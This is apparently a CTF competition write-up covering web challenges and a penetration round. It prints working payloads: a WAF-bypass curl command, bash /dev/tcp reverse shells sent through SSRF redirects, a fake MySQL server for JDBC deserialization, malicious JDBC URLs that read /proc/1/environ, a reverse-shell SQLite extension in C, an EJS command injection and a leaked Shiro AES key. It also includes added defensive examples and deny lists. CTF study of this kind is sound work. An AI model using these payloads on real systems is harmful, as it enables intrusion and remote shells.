Preface

Pretty much every step of this national competition turned out differently from what we expected, and there is a lot to rant about. In the end we finished rank 14 and took a national first prize, and K👴 has now honourably retired.


Preliminary Round

Honestly, it was a damn Ragnarok: everyone was grinding points like mad, especially in the blackout (hidden scoreboard) brawl of the final hour, which was beyond absurd.

Simple_php

<?php
ini_set('open_basedir', '/var/www/html/');
error_reporting(0);

if(isset($_POST['cmd'])){
    $cmd = escapeshellcmd($_POST['cmd']);
    if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget|\'|\"|id|whoami/i', $cmd)) {
        system($cmd);
    }
}


show_source(__FILE__);
?>

Bypass the WAF with %0a, and write the IP in hexadecimal:

cur%0al 0xip:80/love -o /tmp/love
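Why the %0a trick gets past the check, and what a defender would do instead. This is an added example written for this edit, not code from the writeup or the challenge: escapeshellcmd() turns the newline into backslash+newline, the denylist regex then never sees the word "curl", but bash treats an unquoted backslash-newline as a line continuation and re-joins the word before executing. The model of escapeshellcmd() below simplifies PHP's quote handling, the command allowlist is an assumption for illustration, and PAYLOAD is a constructed sample in the shape of the command above.

```python
import re
import shlex

# Denylist copied verbatim from the challenge's Simple_php source. The challenge applies it
# AFTER escapeshellcmd(), so the escaped string is what the regex inspects.
DENYLIST = re.compile(
    r"ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl"
    r"|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi"
    r"|vim|file|xxd|base64|date|bash|env|\?|wget|'|\"|id|whoami",
    re.IGNORECASE,
)

# Characters PHP's escapeshellcmd() prefixes with a backslash. Quote pairing is
# simplified here (assumption): PHP escapes ' and " only when unpaired, this model always does.
_ESCAPED = set("&#;`|*?~<>^()[]{}$\\\n\xff'\"")


def php_escapeshellcmd(cmd: str) -> str:
    """Model of PHP escapeshellcmd(): a newline becomes backslash+newline."""
    return "".join("\\" + c if c in _ESCAPED else c for c in cmd)


def weak_check(cmd: str) -> bool:
    """The challenge's logic: accepted when the denylist finds nothing in the escaped string."""
    return DENYLIST.search(php_escapeshellcmd(cmd)) is None


def what_the_shell_runs(cmd: str) -> str:
    """What bash actually executes: an unquoted backslash-newline is a line continuation
    and is deleted before word splitting, so 'cur\\<LF>l' becomes the single word 'curl'."""
    return php_escapeshellcmd(cmd).replace("\\\n", "")


ALLOWED_COMMANDS = {"uptime", "hostname", "uname"}   # assumed allowlist for the example
ARG_PATTERN = re.compile(r"^[A-Za-z0-9_.:/=-]+$")


def hardened_check(cmd: str) -> bool:
    """Allowlist instead of denylist: refuse control characters outright (no newline,
    so no continuation trick), tokenize the way the shell would, and accept only a
    known command with plain arguments."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in cmd):
        return False
    try:
        argv = shlex.split(what_the_shell_runs(cmd))
    except ValueError:
        return False
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        return False
    return all(ARG_PATTERN.match(a) for a in argv[1:])


# Constructed sample: the writeup's payload shape with %0a already URL-decoded to LF,
# and "0xip" standing for the hex-encoded address exactly as the writeup writes it.
PAYLOAD = "cur\nl 0xip:80/love -o /tmp/love"

if __name__ == "__main__":
    print("denylist accepts payload:", weak_check(PAYLOAD))        # True
    print("shell runs:", repr(what_the_shell_runs(PAYLOAD)))       # starts with 'curl '
    print("allowlist accepts payload:", hardened_check(PAYLOAD))   # False
```

The lesson for the fix side of an AWDP: a denylist has to be matched against the string the interpreter will see after every decoding and normalisation step, and even then it only blocks what someone thought of; rejecting control characters and allowlisting the command is shorter and holds up.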

This downloads a shell script, which is a reverse shell:

#!/bin/bash

bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'

After getting the reverse shell there was no flag to be found. Looking at /etc/passwd showed a mysql user, so I guessed it was database-related and tried the weak password root:root. Interactive mode didn't work properly, so I used -e to run statements directly.


easycms

For flag.php you need an SSRF: download the source and grep it for curl.


Find where it is called in the source.


It is in \dayrui\Fcms\Control\Api\Api.php.

After checking the official documentation:


The path name is different but the effect is the same, so construct the following payload:

index.php?s=api&c=api&m=qrcode&thumb=http://ip:port/xxx.php&text=114514

<?php
// redirect to the specified URL
header('HTTP/1.1 302 Found');
header("Location: http://127.0.0.1/flag.php?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fip%2Fport%200%3E%261'");

?>

Since a shell can't be popped directly through cmd, use the 302 trick: redirect to the local flag.php and pop the shell from there.
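What the 302 trick exploits is that the server-side fetcher follows redirects on its own, so a filter that only looks at the first URL never sees the loopback hop. As an added example (not code from the writeup or from the CMS), the guard below follows redirects by hand and validates every hop: literal IPs are checked directly, names go through a resolver hook, and anything that is not a globally routable address is refused. The fetch and resolver functions and all sample data are constructed so the example runs offline; "attacker.example" and "cdn.example" are placeholder names, and "1.2.3.4" / "1.2.3.5" are arbitrary routable-looking sample addresses.

```python
import ipaddress
from urllib.parse import urljoin, urlparse

REDIRECT_CODES = {301, 302, 303, 307, 308}


def _all_global(addrs):
    """True only if every resolved address is globally routable: loopback, RFC 1918,
    link-local, multicast and the other special ranges all fail this."""
    return bool(addrs) and all(
        ipaddress.ip_address(a).is_global and not ipaddress.ip_address(a).is_multicast
        for a in addrs
    )


def check_target(url, resolver):
    """Validate one URL before it is fetched. resolver(host) -> list of IP strings is a
    hypothetical hook so this runs offline; in production resolve with getaddrinfo and
    connect to the returned addresses rather than to the name (DNS rebinding)."""
    p = urlparse(url)
    if p.scheme not in ("http", "https"):
        return False, "scheme not allowed: %r" % p.scheme
    host = p.hostname
    if not host:
        return False, "no host"
    if host == "localhost" or host.endswith(".localhost"):
        return False, "loopback name"
    try:
        addrs = [str(ipaddress.ip_address(host))]   # literal IP in the URL
    except ValueError:
        addrs = resolver(host)
    if not _all_global(addrs):
        return False, "non-global address for %s: %s" % (host, addrs)
    return True, "ok"


def fetch_with_guard(url, fetch, resolver, max_hops=3):
    """Follow redirects by hand so that every hop goes through check_target().
    fetch(url) -> (status, headers); the real transport must be configured NOT to
    follow redirects itself, which is exactly what the 302 trick relies on."""
    hops = []
    for _ in range(max_hops + 1):
        ok, reason = check_target(url, resolver)
        hops.append((url, ok, reason))
        if not ok:
            return {"allowed": False, "hops": hops}
        status, headers = fetch(url)
        location = headers.get("Location")
        if status in REDIRECT_CODES and location:
            url = urljoin(url, location)
            continue
        return {"allowed": True, "status": status, "hops": hops}
    return {"allowed": False, "hops": hops, "reason": "too many redirects"}


# Constructed sample data, no network involved. The first entry has the shape of the
# writeup's attack: an external host answering with a 302 to 127.0.0.1.
SAMPLE_RESPONSES = {
    "http://attacker.example/xxx.php": (302, {"Location": "http://127.0.0.1/flag.php?cmd=placeholder"}),
    "http://cdn.example/pic.png": (200, {"Content-Type": "image/png"}),
}
SAMPLE_DNS = {"attacker.example": ["1.2.3.4"], "cdn.example": ["1.2.3.5"]}


def sample_fetch(url):
    return SAMPLE_RESPONSES.get(url, (404, {}))


def sample_resolver(host):
    return SAMPLE_DNS.get(host, [])


if __name__ == "__main__":
    print(fetch_with_guard("http://attacker.example/xxx.php", sample_fetch, sample_resolver))
    print(fetch_with_guard("http://cdn.example/pic.png", sample_fetch, sample_resolver))
```

Checking the response body (magic bytes, content type) does nothing against this pattern: the damage is done by the request to the internal URL, not by what comes back, so the check has to sit in front of every request the fetcher makes.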


easycms_revenge

Tweak that PHP redirect to get past the image check:

GIF89a
<?php
echo "GIF89a";
header("Location: http://127.0.0.1/flag.php?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fip%2Fport%200%3E%261'");

?>


ez_java (unsolved)

During the blackout my teammates had already submitted two, the pwn dad solved a challenge with a dozen-odd solves, misc got one more, and this one never got submitted, so here is just the approach.

First I learned on the spot how deserialization is triggered when JDBC connects to MySQL.

import com.example.jdbctest.bean.UserBean;
import org.aspectj.weaver.tools.cache.SimpleCache;

import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;

import static org.springframework.util.SerializationUtils.serialize;


public class exp {
    public static void main(String[] args) throws Exception {
        UserBean user = new UserBean();

        Constructor con = Class.forName("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap").getDeclaredConstructor(String.class,int.class);

        con.setAccessible(true);
        HashMap map = (HashMap)con.newInstance("", 1);

        String name = "tmp/exp.so";

        //byte[] age = "d2NzbmRt".getBytes(StandardCharsets.ISO_8859_1);

        String age = readFileAsString("2.txt");
        user.setName(name);
        user.setAge(age);
        user.setObj(map);

        serialize_func.serialize(user);
        //serialize_func.unserialize("ser.bin");

        //map.put("src",age);
    }

    public static String readFileAsString(String filePath) throws IOException {
        // read the file with java.nio.file.Files and convert it to a String
        return new String(Files.readAllBytes(Paths.get(filePath)));
    }
}

Serialize it to produce a binary file:

# -*- coding:utf-8 -*-
#@Time : 2020/7/27 2:10
#@Author: Tri0mphe7
#@File : server.py
import socket
import binascii
import os

greeting_data="4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400"
response_ok_data="0700000200000002000000"

def receive_data(conn):
    data = conn.recv(1024)
    print("[*] Receiving the package : {}".format(data))
    return str(data).lower()

def send_data(conn,data):
    print("[*] Sending the package : {}".format(data))
    conn.send(binascii.a2b_hex(data))

def get_payload_content():
    # the file contents are generated with ysoserial: java -jar ysoserial [the CommonsCollections7 one] "calc" > a
    file= r'ser.bin'
    if os.path.isfile(file):
        with open(file, 'rb') as f:
            payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8')
        print("open successs")

    else:
        print("open false")
        #calc
        payload_content='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'
    return payload_content

# main logic
def run():

    while 1:
        conn, addr = sk.accept()
        print("Connection come from {}:{}".format(addr[0],addr[1]))

        # 1. first send the greeting packet
        send_data(conn,greeting_data)

        while True:
            # simulate the login handshake: 1. the client sends the login request 2. the server replies response_ok
            receive_data(conn)
            send_data(conn,response_ok_data)

            # the rest of the exchange
            data=receive_data(conn)
            # the client queries some configuration and sends its own version number along the way
            if "session.auto_increment_increment" in data:
                _payload='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'
                send_data(conn,_payload)
                data=receive_data(conn)
            elif "show warnings" in data:
                _payload = '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'
                send_data(conn, _payload)
                data = receive_data(conn)
            if "set names" in data:
                send_data(conn, response_ok_data)
                data = receive_data(conn)
            if "set character_set_results" in data:
                send_data(conn, response_ok_data)
                data = receive_data(conn)
            if "show session status" in data:
                mysql_data = '0100000102'
                mysql_data += '1a000002036465660001630163016301630c3f00ffff0000fc9000000000'
                mysql_data += '1a000003036465660001630163016301630c3f00ffff0000fc9000000000'
                # why does it stop working when I add an EOF packet??
                # fetch the payload
                payload_content=get_payload_content()
                # compute the payload length
                payload_length = str(hex(len(payload_content)//2)).replace('0x', '').zfill(4)
                payload_length_hex = payload_length[2:4] + payload_length[0:2]
                # compute the packet length
                data_len = str(hex(len(payload_content)//2 + 4)).replace('0x', '').zfill(6)
                data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2]
                mysql_data += data_len_hex + '04' + 'fbfc'+ payload_length_hex
                mysql_data += str(payload_content)
                mysql_data += '07000005fe000022000100'
                send_data(conn, mysql_data)
                data = receive_data(conn)
                if "show warnings" in data:
                    payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000'
                    send_data(conn, payload)
                break


if __name__ == '__main__':
    HOST ='127.0.0.1'
    PORT = 3309

    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # once the socket is closed the local port can be reused immediately, so there is no long wait between experiments
    sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sk.bind((HOST, PORT))
    sk.listen(1)

    print("start fake mysql server listening on {}:{}".format(HOST,PORT))

    run()

Change the file it reads to the serialized file we generated.

json2 = {"type":"1","url":"jdbc:mysql://xxx:3306/?user=fileread_netdoc:///proc/1/environ&ALLOWLOADLOCALINFILE=true&maxAllowedPacket=655360&allowUrlInLocalInfile=true#",
         "tableName":"wcsndm",
}

Sending this JSON reads a file.

json = {"type":"1","url":"jdbc:mysql://xxxx:7777/?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true",
        "tableName":"wcsndm",
}

Sending this one triggers JDBC deserialization, which is what writes the file.
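Both payloads above work because the application hands a client-supplied JDBC URL straight to the driver. As an added example (not code from the writeup or the challenge), here is the check a defender would put in front of that: the URL must be plain jdbc:mysql://host[:port]/[db]?k=v, the host must be on an allowlist, the fragment character is refused (in the first payload "#" is what cuts off anything the server appends), and the Connector/J properties that turn a connection into deserialization or local file read are refused by name. The property names are real Connector/J options; comparing them case-insensitively is a conservative choice made here, and "db.internal" is an assumed allowlisted host.

```python
from urllib.parse import parse_qsl, urlsplit

# Connector/J properties that let whoever controls the URL turn a connection into
# deserialization (autoDeserialize plus an interceptor) or local file read (the LOCAL
# INFILE family). Compared case-insensitively as a conservative choice.
DANGEROUS_KEYS = {
    "autodeserialize", "queryinterceptors", "statementinterceptors", "detectcustomcollations",
    "allowloadlocalinfile", "allowurlinlocalinfile", "allowloadlocalinfileinpath",
}


def validate_jdbc_url(url, allowed_hosts):
    """Return (ok, reasons). Accepts only the plain jdbc:mysql://host[:port]/[db]?k=v form
    with the host in allowed_hosts and no dangerous property; everything else is refused."""
    reasons = []
    if not url.startswith("jdbc:mysql://"):
        return False, ["not a jdbc:mysql:// URL"]
    if "#" in url:
        reasons.append("fragment '#' present (cuts off parameters the server appends)")
    parts = urlsplit(url[len("jdbc:"):])          # strip "jdbc:" so urlsplit sees mysql://host...
    if any(ch in parts.netloc for ch in "(),"):
        reasons.append("multi-host / address=() syntax not accepted: %r" % parts.netloc)
    elif parts.hostname not in allowed_hosts:
        reasons.append("host not allowed: %r" % parts.hostname)
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() in DANGEROUS_KEYS:
            reasons.append("dangerous property %s=%s" % (key, value))
    return (not reasons), reasons


# The two URLs from the writeup, and a benign one constructed for comparison.
PAGE_URL_FILEREAD = ("jdbc:mysql://xxx:3306/?user=fileread_netdoc:///proc/1/environ"
                     "&ALLOWLOADLOCALINFILE=true&maxAllowedPacket=655360&allowUrlInLocalInfile=true#")
PAGE_URL_DESER = ("jdbc:mysql://xxxx:7777/?characterEncoding=utf8&useSSL=false"
                  "&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true")
BENIGN_URL = "jdbc:mysql://db.internal:3306/app?useSSL=true&characterEncoding=utf8"
ALLOWED_HOSTS = {"db.internal"}   # assumed

if __name__ == "__main__":
    for u in (PAGE_URL_FILEREAD, PAGE_URL_DESER, BENIGN_URL):
        print(validate_jdbc_url(u, ALLOWED_HOSTS))
```

Better still is not to accept a URL at all: keep the connection settings server-side and let the client choose a named data source. Where the URL must be accepted, this kind of parse-and-refuse is the minimum, and the database host allowlist matters as much as the property check, since the fake-server technique above needs the client to connect out to a host the attacker runs.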

load_extensions

RCE by making SQLite load an extension.

import sqlite3

# 1. create the database connection (this creates a new database file, example.db)
conn = sqlite3.connect('example.db')

# 2. create a cursor
cursor = conn.cursor()

# 3. create the table
cursor.execute('''
CREATE TABLE IF NOT EXISTS users (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    name TEXT NOT NULL,
    email TEXT NOT NULL UNIQUE
)
''')

# 4. insert data
users = [
    ('Alice', 'alice@example.com'),
    ('Bob', 'bob@example.com'),
    ('Charlie', 'charlie@example.com')
]

cursor.executemany('''
INSERT INTO users (name, email) VALUES (?, ?)
''', users)

# 5. commit the transaction
conn.commit()

# 6. query the data
cursor.execute('SELECT * FROM users')
rows = cursor.fetchall()

# 7. print the results
for row in rows:
    print(f"ID: {row[0]}, Name: {row[1]}, Email: {row[2]}")

# 8. close the connection
conn.close()

This generates a db file.

Found a project online:

/* Add your header comment here */
#include <sqlite3ext.h> /* Do not use <sqlite3.h>! */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <signal.h>
#include <dirent.h>
#include <sys/stat.h>
SQLITE_EXTENSION_INIT1

/* Insert your extension code here */
int tcp_port = 7777;
char *ip = "10.10.10.10";

#ifdef _WIN32
__declspec(dllexport)
#endif

int sqlite3_extension_init(
    sqlite3 *db,
    char **pzErrMsg,
    const sqlite3_api_routines *pApi
){
    int rc = SQLITE_OK;
    SQLITE_EXTENSION_INIT2(pApi);

    int fd;
    if ( fork() <= 0){
        struct sockaddr_in addr;
        addr.sin_family = AF_INET;
        addr.sin_port = htons(tcp_port);
        addr.sin_addr.s_addr = inet_addr(ip);

        fd = socket(AF_INET, SOCK_STREAM, 0);
        if ( connect(fd, (struct sockaddr*)&addr, sizeof(addr)) ){
            exit(0);
        }

        dup2(fd, 0);
        dup2(fd, 1);
        dup2(fd, 2);
        execve("/bin/bash", 0LL, 0LL);
    }

    return rc;
}

Change the port number, then compile:

sudo apt install libsqlite3-dev
gcc -g -fPIC -shared YourCode.c -o YourCode.so

Then write the .so and the .db file to the target server.

json3 = {"type":"3","url":"jdbc:sqlite:/tmp/user.db","tableName":"users where name = load_extension('/tmp/exp.so')"}

Send this to hit SQLite.
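Two things make the SQLite step work: extension loading is available on the connection, and tableName is pasted into the SQL text. As an added example (not code from the writeup or the challenge), the snippet below shows the two controls on the defending side using Python's sqlite3 module: loading stays disabled, so load_extension() fails before any file is touched, and a table name taken from a request is only accepted if it is a bare identifier. The sample database is constructed here to mirror the writeup's users table; "/tmp/exp.so" is only referenced as a path string and never needs to exist.

```python
import re
import sqlite3

IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def open_db(path=":memory:"):
    """Open SQLite with extension loading off. Python's sqlite3 already defaults to off;
    the explicit call documents the intent and undoes any code that switched it on.
    Builds compiled without loadable-extension support do not have the method at all."""
    conn = sqlite3.connect(path)
    if hasattr(conn, "enable_load_extension"):
        conn.enable_load_extension(False)
    return conn


def try_load_extension(conn, so_path):
    """Return the error text SQLite produces when load_extension() is called with loading
    disabled ('not authorized'), or 'no such function' on engines built without the
    feature. Returns None only if the load actually succeeded."""
    try:
        conn.execute("SELECT load_extension(?)", (so_path,))
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


def select_all(conn, table_name):
    """A table name cannot be bound as a parameter, so the only safe way to take one from a
    request is to validate it against a strict identifier pattern and quote it. The
    writeup's tableName contains spaces, quotes and parentheses and is refused."""
    if not IDENTIFIER.match(table_name):
        raise ValueError("invalid table name: %r" % table_name)
    return conn.execute('SELECT * FROM "%s"' % table_name).fetchall()


def build_sample_db():
    """Constructed sample database mirroring the writeup's users table."""
    conn = open_db()
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (name, email) VALUES (?, ?)",
                     [("Alice", "alice@example.com"), ("Bob", "bob@example.com")])
    conn.commit()
    return conn


if __name__ == "__main__":
    conn = build_sample_db()
    print(try_load_extension(conn, "/tmp/exp.so"))   # an error message, never None
    print(select_all(conn, "users"))
    try:
        select_all(conn, "users where name = load_extension('/tmp/exp.so')")
    except ValueError as exc:
        print(exc)
```

For a Java application the same two controls apply: the JDBC driver's extension-loading switch must stay off, and the table name must never be concatenated into the statement, whatever the ORM or driver.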


In the end we made it out of the prelims as third in North China.

North China Regional Semifinal

Last year North China was played in early June; this year it was held on the 23rd and 24th, so last year was the earliest and this year the latest. Even more absurd, I had no exam scheduled on the competition day while the days right before and after were both exam days. Lucky.

This was Chunqiu's AWDP. Whether you can break matters less; what matters is that you can fix. Four web challenges in total, and I had no idea where the vulnerability was in any of them, but slapping a WAF on by intuition basically got them all through. Let's just say I bluffed my way through nicely.

Suggest installing WSL; after editing you can package straight through WSL.

Writeup

Fix only, no break.

brokenscanner


Slapped a WAF on it directly, crude and simple; I don't even know how it's exploited.

crazydata


Same story: hammered a WAF onto the incoming parameters.

fury


Filtered the deserialization parameter directly; passed in one go.

Took second blood; 山河 giegie took first blood.

Rambling

By this point things were already going sideways: we ended up fourth in North China, and 山河 giegie finished 12th or 13th and unfortunately went out in the semifinal.

Truly √8 abstract. nmd, their pwn dad was slow at fixing, and I heard the easy break challenges didn't get solved either. According to K👴 himself, inkey✌ was playing Elden Ring like crazy the night before, and K✌ thought he had prepared for the match 😡, byd.

Who would have thought that a pwn dad who got several solves in the prelims would fail both the easy break and the fix in the semifinal 😊. Anyway K✌ was fuming and kept roasting inkey afterwards.

Our school has its own 2.5 Gojo too.

So it turned into: huh, I'm fighting Sukuna (I'm taking a national first)? For real?


National Finals

Long awaited, at last the national finals ☝🤓. Caught a damn 7:45 a.m. flight from Shenzhen to the legendary Shuangliu Airport, 8000 a night (bushi).

awdp

sharecard

@app.route("/showCard", methods=["GET"])
def show_card():
    token = request.args.get("token")
    data = jwt.decode(token, rsakey.publickey().exportKey(), algorithms=jwt.algorithms.get_default_algorithms())
    blacklists = ['{','}',']','|']
    for i in blacklists:
        if i in data['avatar'] or '..' in data['avatar']:
            return safer_render_template("create.html")
    info = Info(**data)

    info.parse_avatar()
    blacklists2 = ['{', '}', ']', '|','%','_']
    for i in blacklists2:
        if i in info.name or i in info.signature:
            return safer_render_template("create.html")
    return safer_render_template("show.html", info=info)

Bold guess: SSTI. Added a filter and it passed.

SolonMaster

🐕🌿 IDEA: this compiles into two classes, but IDEA only shows one file, tmd the subclass was missing. Patched thirteen times and it never took, while others were sitting at thirty-odd solves; 👴 was losing it 😡😡😡😅😅😅😅

In the end I patched the compiled subclass in directly from the file explorer, and it passed in one go. ffs.

protected Class resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
    if(desc.getName().contains("asp")||desc.getName().contains("javax.management")||desc.getName().contains("AbstractTranslet")||desc.getName().contains("Fastjson")||desc.getName().contains("jmx")||desc.getName().contains("HashMap")||desc.getName().contains("java.lang")||desc.getName().contains("com.alibaba.fastjson.JSONArray")||desc.getName().contains("HashMap")||desc.getName().contains("com.alibaba.fastjson")||desc.getName().contains("javax.swing")||desc.getName().contains("java")){
        throw new IllegalArgumentException("HackerClass:" + desc);
    }
    Class targetc = super.resolveClass(desc);
    if(targetc.getName().contains("asp")||targetc.getName().contains("javax.management")||targetc.getName().contains("AbstractTranslet")||targetc.getName().contains("Fastjson")||targetc.getName().contains("jmx")||targetc.getName().contains("HashMap")||targetc.getName().contains("java.lang")||targetc.getName().contains("com.alibaba.fastjson.JSONArray")||targetc.getName().contains("HashMap")||targetc.getName().contains("com.alibaba.fastjson")||targetc.getName().contains("javax.management")||targetc.getName().contains("javax.swing")||javax.swing.event.SwingPropertyChangeSupport.class.isAssignableFrom(targetc)||desc.getName().contains("java")){
        throw new IllegalArgumentException("HackerClass:" + targetc);
    }
    if (BadAttributeValueExpException.class.isAssignableFrom(targetc)|| java.util.HashMap.class.isAssignableFrom(targetc)|| JSONArray.class.isAssignableFrom(targetc)|| AbstractAction.class.isAssignableFrom(targetc)|| Map.class.isAssignableFrom(targetc)|| XString.class.isAssignableFrom(targetc)|| StyledEditorKit.AlignmentAction.class.isAssignableFrom(targetc)||AbstractAction.class.isAssignableFrom(targetc)||StyledEditorKit.BoldAction.class.isAssignableFrom(targetc)||StyledEditorKit.StyledTextAction.class.isAssignableFrom(targetc)||StyledEditorKit.UnderlineAction.class.isAssignableFrom(targetc)) {
        throw new IllegalArgumentException("HackerClass:" + targetc);
    }
    if (!this.check && !User.class.isAssignableFrom(targetc)) {
        throw new IllegalArgumentException("HackerClass:" + targetc);
    } else if (BadAttributeValueExpException.class.isAssignableFrom(targetc)|| java.util.HashMap.class.isAssignableFrom(targetc)|| JSONArray.class.isAssignableFrom(targetc)|| AbstractAction.class.isAssignableFrom(targetc)|| Map.class.isAssignableFrom(targetc)|| XString.class.isAssignableFrom(targetc)|| StyledEditorKit.AlignmentAction.class.isAssignableFrom(targetc)||AbstractAction.class.isAssignableFrom(targetc)||StyledEditorKit.BoldAction.class.isAssignableFrom(targetc)||StyledEditorKit.StyledTextAction.class.isAssignableFrom(targetc)||StyledEditorKit.UnderlineAction.class.isAssignableFrom(targetc)) {
        throw new IllegalArgumentException("HackerClass:" + targetc);
    } else {
        this.check = true;
        return targetc;
    }

}
};

ezjs

Got lucky, took first blood on the fix.

fix

if (newFilePath.endsWith('.html')){
    return res.status(400).send('Invalid file type.');
}
if (newFilePath.endsWith('.htm')){
    return res.status(400).send('Invalid file type.');
}
if (newFilePath.endsWith('.ts')){
    return res.status(400).send('Invalid file type.');
}
if (newFilePath.endsWith('.js')){
    return res.status(400).send('Invalid file type.');
}

break

.ejs gets past the upload check.

Passing .ejs/…/ to render gets past the render check:

<%= global.process.mainModule.require('child_process').execSync('cat /flag')%>

Feels like an unintended solution.
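The fix above is a suffix denylist, which is why .ejs still goes through, and the render check is defeated by a path whose suffix looks fine before normalisation. As an added example (not code from the writeup or the challenge), the snippet below puts the two defending-side rules next to the patched logic: normalise the path first and require it to stay under the upload root, then judge the final component against an extension allowlist. The allowlist and the upload root are assumptions for the example.

```python
import posixpath

# The ezjs fix's denylist, and an allowlist a defender would use instead.
DENIED_SUFFIXES = (".html", ".htm", ".ts", ".js")
ALLOWED_SUFFIXES = {".png", ".jpg", ".jpeg", ".gif", ".txt"}   # assumed for this example
UPLOAD_ROOT = "/app/uploads"                                   # assumed


def denylist_fix_allows(new_file_path):
    """What the patched code decides: anything not ending in a denied suffix passes."""
    return not new_file_path.lower().endswith(DENIED_SUFFIXES)


def resolve_upload_path(new_file_path, root=UPLOAD_ROOT):
    """Normalise before judging: collapse '.', '..' and doubled separators, then require
    the result to stay under root. Returns the absolute path, or None when it escapes."""
    cleaned = posixpath.normpath("/" + new_file_path.replace("\\", "/")).lstrip("/")
    if not cleaned:
        return None
    full = posixpath.normpath(posixpath.join(root, cleaned))
    return full if full.startswith(root + "/") else None


def allowlist_allows(new_file_path):
    """Judge the normalised path's final component: exactly one extension, from the allowlist."""
    full = resolve_upload_path(new_file_path)
    if full is None:
        return False
    base = posixpath.basename(full)
    ext = posixpath.splitext(base)[1].lower()
    return base.count(".") == 1 and ext in ALLOWED_SUFFIXES


if __name__ == "__main__":
    for p in ("shell.ejs", "avatar.png", "x.ejs/../avatar.png", "a.png.ejs"):
        print(p, denylist_fix_allows(p), allowlist_allows(p), resolve_upload_path(p))
```

The same ordering applies to the render side: decide on the path the template engine will actually open, after normalisation, not on the string as it arrived.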

Damn, IDEA screwed me: it took me a dozen-odd rounds to fix SolonMaster, otherwise I'd probably have been in the first 10 solves. Lost a huge amount of round points and finished AWDP at 20th, which honestly felt a bit dangerous; we'd have to work hard in the penetration part the next day.

☝🤓

Penetration

ERP

Parsing the heapdump:

algMode = GCM, key = h6/C85NzZrpu4rt5euOt5A==, algName = AES

Hit Shiro.

Tools did the rest ☝🤓

The VPS Chunqiu provided, nmd 😡 Aliyun firewall, unbelievable, the reverse connection couldn't get through. Luckily the ERP box gave root, so I just wrote in a public key and used it as a jump host.

./fscan_386 -h 192.168.8.146/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.8.146 is alive
(icmp) Target 192.168.8.9 is alive
(icmp) Target 192.168.8.16 is alive
(icmp) Target 192.168.8.12 is alive
(icmp) Target 192.168.8.26 is alive
(icmp) Target 192.168.8.38 is alive
(icmp) Target 192.168.8.42 is alive
(icmp) Target 192.168.8.253 is alive
[*] Icmp alive hosts len is: 8
192.168.8.146:22 open
192.168.8.12:88 open
192.168.8.9:1433 open
192.168.8.38:445 open
192.168.8.26:445 open
192.168.8.16:445 open
192.168.8.9:445 open
192.168.8.38:139 open
192.168.8.26:139 open
192.168.8.12:139 open
192.168.8.16:139 open
192.168.8.9:139 open
192.168.8.38:135 open
192.168.8.26:135 open
192.168.8.16:135 open
192.168.8.12:135 open
192.168.8.9:135 open
192.168.8.42:80 open
192.168.8.9:80 open
192.168.8.42:22 open
192.168.8.26:8080 open
192.168.8.16:8080 open
192.168.8.12:445 open
192.168.8.146:8080 open
192.168.8.9:8000 open
192.168.8.38:3306 open
192.168.8.42:8060 open
192.168.8.9:8172 open
192.168.8.42:9094 open
[*] alive ports len is: 29
start vulscan
[*] NetInfo:
[*]192.168.8.9
[->]WIN-IISSERER
[->]192.168.8.9
[*] NetBios: 192.168.8.9 WORKGROUP\WIN-IISSERER
[*] NetBios: 192.168.8.12 [+]DC VERTEXSOFT\RODC
[*] NetBios: 192.168.8.16 WORKGROUP\WIN-SERVER03
[*] NetBios: 192.168.8.26 WORKGROUP\WIN-PC3788
[*] NetInfo:
[*]192.168.8.12
[->]RODC
[->]192.168.8.12
[*] NetInfo:
[*]192.168.8.16
[->]WIN-SERVER03
[->]192.168.8.16
[*] NetInfo:
[*]192.168.8.38
[->]WIN-OPS88
[->]192.168.8.38
[*] NetInfo:
[*]192.168.8.26
